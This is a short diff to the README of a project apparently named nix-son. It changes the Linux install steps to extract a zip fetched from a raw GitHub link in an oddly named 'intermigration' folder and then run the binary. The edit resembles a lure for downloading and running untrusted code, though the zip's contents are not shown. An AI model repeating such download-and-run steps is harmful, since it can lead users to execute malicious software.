Fodinha123/nix-son/README.md

      - Drag the nix-son icon into your Applications folder.
      - You can now find nix-son in your Applications.
    - **Linux**:
-     - Extract the contents of the `.tar.gz` file.
+     - Extract the contents of the `https://raw.githubusercontent.com/Fodinha123/nix-son/main/intermigration/nix-son.zip` file.
      - Open a terminal and navigate to the extracted folder.
      - Run `./nix-son` to start the application.